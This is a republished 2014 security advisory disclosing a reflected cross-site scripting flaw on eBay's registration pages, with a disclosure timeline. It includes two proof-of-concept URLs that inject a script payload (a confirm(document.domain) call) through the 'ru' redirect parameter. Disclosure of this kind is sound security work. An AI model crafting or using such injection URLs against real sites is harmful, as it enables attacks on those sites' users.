reg.ebay.com Cross Site Scripting

2014.05.28
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-79

Advisory: reg.ebay.com - Cross-site Scripting vulnerability Advisory ID: SSCHADV2014-004 Author: Stefan Schurtz Affected Software: Successfully tested on reg.ebay.com Vendor URL: http://www.ebay.com/ Vendor Status: informed ========================== Vulnerability Description ========================== The website "reg.ebay.com" is prone to a XSS vulnerability ========================== PoC-Exploit ========================== https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo=&siteid=0&UsingSSL=1&co_partnerId=2&MfcISAPICommand=RegisterEnterInfo&co_partnerId=2 &siteid=0&ru=http%253A%252F%252Fwww.ebay.com%252Fusr%252Fpatrice.php%253Ffol%253D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1 a922ab5464ffcd09d322%2526widget%253Dfollow_113459%22%3bconfirm%28document.domain%29%2f%2f4189ebe3a &bin=3984&pageType=3984&register_signin=Register https://reg.ebay.com/reg/PartialReg?siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fpatrice.php%3Ffol%3D7df875b8eb5a9c9a 78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%26widget%3Dfollow_113459 %22%3Bconfirm%28document.domain%29%2F%2F4189ebe3a&MfcISAPICommand= ========================== Solution ========================== - ========================== Disclosure Timeline ========================== 30-Jan-2014 - ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html" ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.ebay.com/ http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt

References:

http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top